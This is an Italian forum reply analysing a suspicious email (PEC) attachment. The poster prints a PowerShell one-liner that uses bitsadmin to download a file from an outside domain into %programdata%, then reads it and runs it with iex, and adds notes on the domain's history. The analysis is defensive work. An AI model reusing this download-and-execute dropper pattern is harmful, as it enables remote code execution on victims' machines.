Ultima modifica:
Mmmm il codice sostanzilamente crea un link a powershell ed esegue uno script che sembra scaricare ed eseguire qualcosa:
Il codice powershell
scarica utilizzando bitsadmin /transfer il contenuto di https://leonelmachava.com/leo/.../novo.rtf dentro %programdata%\novo.rtf, ne legge poi il contenuto (gc sta per Get-Content) e lo esegue utilizzando iex
La PEC arrivava da qualcuno di conosciuto oppure da un indirizzo mai visto prima?
Guardando dalla WaybackMachine il dominio leonelmachava.com risultava online l'ultima volta nel 2014, ed era un blog statico in wordpress:
Ora però non mi pare che sia ancora up, io personalmente non riesco a raggiungerlo
Il codice powershell
Codice:
powershell -c &""{
bitsadmin /transfer NkNZyTlr https://leonelmachava.com/leo/.../novo.rtf %programdata%\novo.rtf;
$mc=gc %programdata%\novo.rtf | Out-String; $mc |iex
}""
La PEC arrivava da qualcuno di conosciuto oppure da un indirizzo mai visto prima?
Guardando dalla WaybackMachine il dominio leonelmachava.com risultava online l'ultima volta nel 2014, ed era un blog statico in wordpress:
Ora però non mi pare che sia ancora up, io personalmente non riesco a raggiungerlo